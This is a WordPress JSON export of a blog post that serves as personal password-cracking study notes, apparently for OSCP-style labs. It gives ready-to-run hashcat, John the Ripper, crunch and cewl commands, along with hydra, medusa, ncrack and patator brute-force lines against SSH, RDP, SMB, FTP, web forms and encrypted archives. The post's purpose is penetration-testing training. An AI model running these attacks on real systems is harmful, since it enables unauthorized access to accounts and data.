{"id":391,"date":"2019-09-08T18:03:29","date_gmt":"2019-09-08T16:03:29","guid":{"rendered":"https:\/\/privat.andreas-klingler.de\/itsec\/?p=391"},"modified":"2024-11-04T21:34:37","modified_gmt":"2024-11-04T20:34:37","slug":"hashcat","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=391","title":{"rendered":"Passwort cracking"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">(!) See also <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1923\" data-type=\"post\" data-id=\"1923\">Pass\u00adword spray\u00ading<\/a> to check a obtained pass\u00adword against usernames.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Check hash against dbs:&nbsp;<ol class=\"wp-block-list\">\n<li><a href=\"https:\/\/hashkiller.co.uk\">https:\/\/hashkiller.co.uk<\/a> <\/li>\n\n\n\n<li><a href=\"https:\/\/hashes.org\/\">https:\/\/hashes.org\/<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/crackstation.net\/\">https:\/\/crackstation.net\/<\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.onlinehashcrack.com\/ \">https:\/\/www.onlinehashcrack.com\/ <\/a><\/li>\n\n\n\n<li><a href=\"https:\/\/www.hashes.org\/\">https:\/\/www.hashes.org\/<\/a><\/li>\n<\/ol>\n<\/li>\n\n\n\n<li>Define own wordlist first, if e.g. a web site is avail\u00adable (cewl!)<\/li>\n\n\n\n<li>Use a pre\u00adde\u00adfined wordlist<\/li>\n\n\n\n<li>crack.<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Note: Use <a href=\"http:\/\/rumkin.com\/tools\/cipher\/\">http:\/\/rumkin.com\/tools\/cipher\/<\/a> if you have to encode\/decrypt\/decipher some\u00adthing on the&nbsp;fly.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Wordlist optimization<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If there is a pass\u00adword pol\u00adi\u00adcy&nbsp;known:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Remove all pass\u00adwords from the list which does not sat\u00adis\u00adfy the requirements.<\/li>\n\n\n\n<li>Build an own wordlist with the pol\u00adi\u00adcy&nbsp;rules.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Check password policy<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">In Win\u00addows,&nbsp;type<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">net accounts<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">to get infor\u00adma\u00adtions about account lock\u00ading, lock\u00adout threash\u00adolds&nbsp;etc.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Cloud-based performance cracking<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/Coalfire-Research\/npk\">See <span class=\"caps\">NPK<\/span><\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Default passwords<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/default-password.info\/\">https:\/\/default-password.info\/<\/a><\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Hashcat<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Am schnell\u00adsten auf&nbsp;iMac:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/opt\/hashcat\/hashcat -m1800 -a0 -O --self-test-disable -r \/opt\/hashcat\/rules\/best66.rule test.hash \/opt\/wordlists\/rockyou.txt <br><br>\/opt\/hashcat\/hashcat -m1800 -a0 -O --self-test-disable -r \/opt\/hashcat\/rules\/rockyou-30000.rule test.hash \/opt\/wordlists\/rockyou.txt <\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Note: You can add mul\u00adti\u00adple wordlists!<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Fort\u00adset\u00adzen, wenn vorher mit \u2011c unter\u00adbrochen wurde:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/opt\/hashcat\/hashcat --session name_der_sitzung --restore<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Typ eines Hashs ermitteln:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hashid &lt;hash_dollar_maskieren&gt;\nhash-identifier<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Show hashs and search formats:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hashcat --sample-hashes | grep $9$<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Para\u00adme\u00adters:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>-a &lt;attack_mode&gt;<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\"> 0 = Straight\n1 = Combination\n2 = Toggle-Case\n3 = Brute-force\n4 = Permutation\n5 = Table-Lookup\n8 = Prince<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>-m &lt;hash_type&gt;<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">man hashcat\n       1600 = Apache MD5 (for htaccess, <a href=\"https:\/\/hashcat.net\/wiki\/doku.php?id=frequently_asked_questions#how_can_i_crack_passwords_from_htpasswd\">althought there are also other formats<\/a>)\n       1800 = SHA-512(Unix)<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Hash for\u00admats: <a href=\"https:\/\/hashcat.net\/wiki\/doku.php?id=example_hashes\">https:\/\/hashcat.net\/wiki\/doku.php?id=example_hashes<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Modify wordlists with&nbsp;rules<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Hash\u00adcat can parse .rule files which describe trans\u00adfor\u00adma\u00adtions of the wordlist. Each line in a rule file defines one transformation.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">An exam\u00adple, where each word becomes three&nbsp;words:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\" style=\"margin-right:var(--wp--preset--spacing--xx-small);margin-left:var(--wp--preset--spacing--xx-small)\">$ cat list1.rule<br>$1<br>c<br>$!<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Anoth\u00ader exam\u00adple, where each word stays one word, only that the rules are applied:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$ cat list1.rule<br>$1 c $!<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This file leads to the trans\u00adfor\u00adma\u00adtion of every word&nbsp;by<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>adding a 1 after each&nbsp;word,<\/li>\n\n\n\n<li>cap\u00adi\u00adtal\u00adiz\u00ading each word&nbsp;and<\/li>\n\n\n\n<li>adding a ! at the end of each&nbsp;word.<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">The fol\u00adlow\u00ading com\u00admand prints the changed wordlist:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hashcat -r list.rule --stdout list.txt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Note: In the <strong>\/usr\/share\/hashcat\/rules\/<\/strong> are many exam\u00adple rules. See <a href=\"https:\/\/hashcat.net\/wiki\/doku.php?id=rule_based_attack\">https:\/\/hashcat.net\/wiki\/doku.php?id=rule_based_attack<\/a> for all operations.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Hash determination<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">hash-identifier<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Bekommt einen Hash und r\u00e4t das Verfahren.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Wordlist creation<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">crunch<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Erstellt Kom\u00adbi\u00adna\u00adtio\u00adnen von Zeichen.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">crunch &lt;min&gt; &lt;max&gt; &lt;zeichenmenge&gt; -o out.txt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">z.B. erstellt crunch 2 3 0123456789 \u2011o \/tmp\/o.txt alle Kom\u00adbi\u00adna\u00adtio\u00adnen aus Zahlen von zwei bis drei Stellen.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Crunch kann auch Pass\u00adw\u00f6rter nach Mustern erstellen. Das kann sehr sin\u00adnvoll sein, wenn man z.B. die Pass\u00adwort-Richtlin\u00adien ken\u00adnt oder die Pass\u00adw\u00f6rter in ihrer Struk\u00adtur son\u00adst ein\u00adschr\u00e4nken kann.<\/p>\n\n\n\n<div class=\"page\" title=\"Page 269\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>crunch 8 8 -t ,@@^^%%% \/\/ siehe Offsec-PDF, Seite 269<\/pre>\n<h3>cewl<\/h3>\n<p>cewl can crawl sites and extract can\u00addi\u00addates for pass\u00adwords which can then be used to cre\u00adate pass\u00adword with pat\u00adtern. (m = Min\u00adi\u00admum word length, d = recur\u00adsive fol\u00adlow&nbsp;depth)<\/p>\n<div class=\"page\" title=\"Page 274\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>cewl -m 6 -d 1 www.megacorpone.com &gt; megacorp-cewl.txt<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">Use John to mutate a wordlist. <span class=\"caps\">OR<\/span> use pw-inspec\u00adtor to fil\u00adter the list to obtain only can\u00addi\u00addates which com\u00adplies with known pass\u00adword&nbsp;rules.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">pw-inspector -i cewl.txt -m 6 -M 20 <\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">John the ripper<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">JTR<\/span> John the rip\u00adper can cre\u00adate vari\u00ada\u00adtions of pass\u00adword lists which were cre\u00adat\u00aded e.g. with&nbsp;cewl.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/countuponsecurity.files.wordpress.com\/2016\/09\/jtr-cheat-sheet.pdf\">https:\/\/countuponsecurity.files.wordpress.com\/2016\/09\/jtr-cheat-sheet.pdf<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.\/john \u2013wordlist=\/tmp\/wl \u2013rules:Extra \u2013std\u00adout &gt; \/tmp\/customwordlist<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">.\/john \u2013wordlist=\/opt\/rockyou.txt \/tmp\/zip.hash dont forget!!!!!!!!<\/p>\n\n\n\n<div class=\"page\" title=\"Page 276\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>john --wordlist=megacorp-cewl.txt --rules --stdout &gt; mutated.txt<\/pre>\n<\/div>\n<p>This applies the default muta\u00adtion rules. To e.g. add two dig\u00adits after each pass\u00adword, add in \/etc\/john\/john.conf in the sec\u00adtion [List.Rules:Wordlist] the fol\u00adlow\u00ading two&nbsp;lines:<\/p>\n<pre># Add one number to the end of each password\n$[0-9]\n# Add two numbers to the end of each password\n$[0-9]$[0-9]<\/pre>\n<\/div>\n<div class=\"layoutArea\">\n<p>Note: See https:\/\/null-byte.wonderhowto.com\/forum\/to-use-multiple-threads-cpus-while-cracking-passwords-with-john-ripper-free-version-0187017\/ for opti\u00admiza\u00adtion for all cpu&nbsp;cores.<\/p>\n<div class=\"column\">\n<h1>Brute force<\/h1>\n<h3>Medusa<\/h3>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">Medusa under\u00adstands many pro\u00adto\u00adcols which can be test\u00aded against wordlists. Can be used for <span class=\"caps\">FTP<\/span>, <span class=\"caps\">HTTP<\/span>,&nbsp;<span class=\"caps\">SSH<\/span>,&nbsp;\u2026<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Does\u00adn\u2019t seem to work with vir\u00adtu\u00adal&nbsp;hosts!<\/strong><\/p>\n\n\n\n<div class=\"page\" title=\"Page 278\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>medusa -h $victim -u admin -P password-file.txt -M http -m DIR:\/admin -T 10<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<pre class=\"wp-block-preformatted\">medusa \\\n  -h 10.11.1.44 \\\n  -u admin \\\n  -P \/usr\/share\/wordlists\/rockyou.txt \\\n  -M web-form \\\n  -m FORM:\"admin\" \\\n  -m DENY-SIGNAL:\"invalid password\" \\\n  -m FORM-DATA:\"post?u=&amp;password=&amp;send=%2Fadmin%2Fsite&amp;login=\"<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">medusa -h $victim -u bethany -P Dog_Names_normalized.txt -M http -m DIR:\/Admin -T 2<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">ncrack<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">High-speed crack\u00ading, faster than medusa in one exam\u00adple. Can also brute force Win\u00addows&nbsp;<span class=\"caps\">RDP<\/span>.<\/p>\n\n\n\n<div class=\"page\" title=\"Page 279\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>ncrack -vv --user offsec -P password-file.txt rdp:\/\/$victim<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Hydra<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Note: xHy\u00addra can be used for configuration!<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><span class=\"caps\">NOTE<\/span><\/strong>: http-post-form!<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Also high-speed<\/p>\n\n\n\n<div class=\"page\" title=\"Page 279\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<pre>hydra -P password-file.txt -v $victim snmp<\/pre>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">Anoth\u00ader exam\u00adple which per\u00adforms <span class=\"caps\">HTTP<\/span> post requests. After the <span class=\"caps\">URL<\/span> and \u201c:\u201d, the post body is defined. After anoth\u00ader \u201c:\u201d a string which indi\u00adcates that the login attemp was failed.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra $victim http-post-form \"\/admin\/index.php:user=^USER^&amp;pw=^PASS^:Wrong password\" -l admin -P \/usr\/share\/wordlists\/rockyou.txt -t 10 -w 30<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If this does\u00adn\u2019t work, a Vhost can also be added via a host head\u00ader like <em>:H=Host\\: &lt;vhost&gt;<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Anoth\u00ader exam\u00adple which checks the head\u00ader of the response (to check the state, use S=302)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra staging-order.mango.htb http-post-form \"\/:username=^USER^&amp;password=^PASS^:H=location: home.php\" -l admin -P \/usr\/share\/wordlists\/rockyou.txt -t 20 -w 30<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Attack <span class=\"caps\">SMB<\/span>\/Samba:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -l marko -P \/usr\/share\/wordlists\/rockyou.txt $victim smb<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Add cook\u00adies to requests:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra $victim http-post-form \"\/bolt\/bolt\/login:user_login%5Busername%5D=^USER^&amp;user_login%5Bpassword%5D=^PASS^&amp;user_login%5Blogin%5D=&amp;user_login%5B_token%5D=-UKrYiVKX6bHmuQbPI75IgdiBVf2FgPpxUpjpj352i4:F=Please check your input:H=Cookie: bolt_session_274a029ed9ae3bfc27bd20e0afcafdcc=871d6acbc17c5822417b1cb094\" -l admin -P \/usr\/share\/wordlists\/rockyou.txt -t 10 -w 30<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple with proxy and <span class=\"caps\">SSL<\/span> (Burp)<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">HYDRA_PROXY_HTTPS=https:\/\/localhost:8080\/ hydra $victim http-post-form \"\/admin:password=^PASS^&amp;send=%2Fadmin%2Fsite&amp;login=&amp;gg=^USER^:F=invalid password:H=Cookie: session_id_issue_tracker=192.168.119.158-e1a56146-27a4-4946-b4a8-4fdf399e106a; session_id_admin=192.168.119.158-0436a0f5-f902-44de-8f80-8cf4567671e6\" -l \"\" -P \/usr\/share\/wordlists\/rockyou.txt -t 10 -w 30 -S -I -s 8000<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Tel\u00adnet<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -P passwords.txt -L users.txt $victim telnet -V\nhydra -C users_and_passwords.txt $victim telnet -V<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">SSH<\/span><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra $target ssh -l eleanor -P \/usr\/share\/wordlists\/rockyou.txt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">FTP<\/span><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -C users_and_passwords2.txt ftp:\/\/$victim<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">MySQL<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -C users_and_passwords2.txt mysql:\/\/$victim<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">SMTP<\/span><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -P \/usr\/share\/wordlists\/rockyou.txt -l root $target smtp -V<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><span class=\"caps\">RDP<\/span><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -P \/usr\/share\/wordlists\/rockyou.txt -l albert rdp:\/\/192.168.165.227<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Or, pass\u00adword spray\u00ading the oth\u00ader way&nbsp;round:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra -L dirb\/others\/names.txt -p \"SuperPasswordFoundSomewhere\" rdp:\/\/192.168.165.202<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Patator<\/h1>\n\n\n\n<p class=\"wp-block-paragraph\">Break <span class=\"caps\">RDP<\/span> Remote Desk\u00adtop&nbsp;login<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">patator rdp_login host=$victim user='Maria' password=FILE0 0=\/usr\/share\/wordlists\/rockyou.txt.ascii<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Break <span class=\"caps\">VNC<\/span>&nbsp;login<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">patator vnc_login host=$victim password=FILE0 0=\/usr\/share\/wordlists\/rockyou.txt.ascii -t 1 -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Break tel\u00adnet<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">patator telnet_login host=$victim inputs='FILE0\\nFILE1' 0=users.txt 1=passwords.txt persistent=0 prompt_re='Username:|Password:' -x ignore:egrep='Login incorrect.+Username:'<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Protocols<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\">Crack OpenSSH identity keys<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Con\u00advert the id_rsa file<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">python \/usr\/share\/john\/ssh2john.py id_rsa &gt; \/tmp\/id_rsa.hash<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Run JtR:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted precode\">john \/tmp\/id_rsa.hash -wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Run John The Rip\u00adper with&nbsp;rules:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Add rules to \/etc\/john\/john.conf:<br><code>[List.Rules:sshRules]<\/code><br><code>c $1 $3 $7 $!<\/code><br><code>c $1 $3 $7 $<\/code>@<br><code>c $1 $3 $7 $#<\/code><\/li>\n\n\n\n<li>Exe\u00adcute<br><code>john \/tmp\/id_rsa.hash -wordlist=\/usr\/share\/wordlists\/rockyou.txt --rules=sshRules<\/code><\/li>\n<\/ol>\n\n\n\n<h1 class=\"wp-block-heading\">File formats<\/h1>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"caps\">PDF<\/span><\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">pdfcrack --wordlist=\/usr\/share\/wordlists\/rockyou.txt $filename<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">or<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\/usr\/share\/john\/pdf2john.pl file.pdf &gt; \/tmp\/pdf.hash\njohn \/tmp\/pdf.hash<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"caps\">ZIP<\/span><\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\/usr\/share\/john\/zip2john.pl file.zip &gt; \/tmp\/zip.hash<br>john \/tmp\/zip.hash \/\/ iterative<br>john -wordlist:\/usr\/share\/wordlists\/rockyou.txt \/tmp\/zip.hash \/\/ with wordlist<br>while cracking, have a look into the file names with vi zip.zip<br><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">fcrackzip [-D \u2011p \/usr\/share\/wordlists\/rockyou.txt] t.zip<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"caps\">RAR<\/span><\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\/usr\/share\/john\/rar2john.pl file.rar &gt; \/tmp\/rar.hash\njohn \/tmp\/zip.hash<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Links and various notes<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Good overview and tips for var\u00adi\u00adous pro\u00adto\u00adcols: <a href=\"https:\/\/github.com\/frizb\/Hashcat-Cheatsheet\">https:\/\/github.com\/frizb\/Hashcat-Cheatsheet<\/a><\/li>\n\n\n\n<li>Win\u00addows seems to store all old pass\u00adwords for\u00adev\u00ader in a <span class=\"caps\">CREDHIST<\/span>.<a href=\"https:\/\/sudonull.com\/post\/6370-Secrets-DPAPI-or-DPAPI-for-pentesters\"> See this <span class=\"caps\">DPAPI<\/span> article.<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>(!) See also Pass\u00adword spray\u00ading to check a obtained pass\u00adword against user\u00adnames. Note: Use http:\/\/rumkin.com\/tools\/cipher\/ if you have to encode\/decrypt\/decipher some\u00adthing on the&nbsp;fly. Wordlist opti\u00admiza\u00adtion If there is a pass\u00adword pol\u00adi\u00adcy&nbsp;known: Check pass\u00adword pol\u00adi\u00adcy In Win\u00addows,&nbsp;type net accounts to get infor\u00adma\u00adtions about account lock\u00ading, lock\u00adout threash\u00adolds&nbsp;etc. Cloud-based per\u00adfor\u00admance crack\u00ading See <span class=\"caps\">NPK<\/span> Default pass\u00adwords Hash\u00adcat&nbsp;Am&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[468],"tags":[127,128,112,110,113,129,125,126,124,130,111,30,279,46,123],"class_list":["post-391","post","type-post","status-publish","format-standard","hentry","category-general","tag-cewl","tag-crunch","tag-hash","tag-hashcat","tag-hcat","tag-hydra","tag-john","tag-john-the-ripper","tag-medusa","tag-ncrack","tag-password","tag-passwort-cracking","tag-rar","tag-ssh","tag-wordlist"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=391"}],"version-history":[{"count":73,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/391\/revisions"}],"predecessor-version":[{"id":4483,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/391\/revisions\/4483"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}